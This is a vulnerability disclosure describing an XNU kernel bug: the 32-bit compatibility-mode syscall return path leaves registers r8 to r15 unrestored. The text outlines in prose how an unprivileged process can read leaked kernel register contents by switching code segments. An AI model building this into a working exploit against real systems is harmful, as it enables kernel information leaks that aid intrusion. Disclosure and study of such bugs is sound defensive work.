XNU Kernel 32-bit Binary Syscall Return Path Vulnerability
The XNU kernel, when compiled for a x86-64 CPU, can run 32-bit x86 binaries in compatibility mode. 32-bit binaries use partly separate syscall entry and exit paths. To return to userspace, unix_syscall() in bsd/dev/i386/systemcalls.c calls thread_exception_return() (in osfmk/x86_64/locore.s), which in turn calls return_from_trap, which is implemented in osfmk/x86_64/idt64.s. return_from_trap() normally branches into return_to_user relatively quickly, which then, depending on the stack segment selector, branches into either L_64bit_return or L_32bit_return. While the L_64bit_return path restores all userspace registers, the L_32bit_return path only restores the registers that are accessible in compatibility mode; the registers r8 to r15 are not restored. This is bad because, although switching to compatibility mode makes it impossible to directly access r8..r15, the register contents are preserved, and switching back to 64-bit mode makes the 64-bit registers accessible again. An unprivileged 32-bit process can leak kernel register contents as follows: make a normal 32-bit syscall, switch to 64-bit mode (e.g. by loading the 64-bit user code segment using iret), store the contents of r8..r15, switch back to compatibility mode (e.g. by loading the 32-bit user code segment using iret).
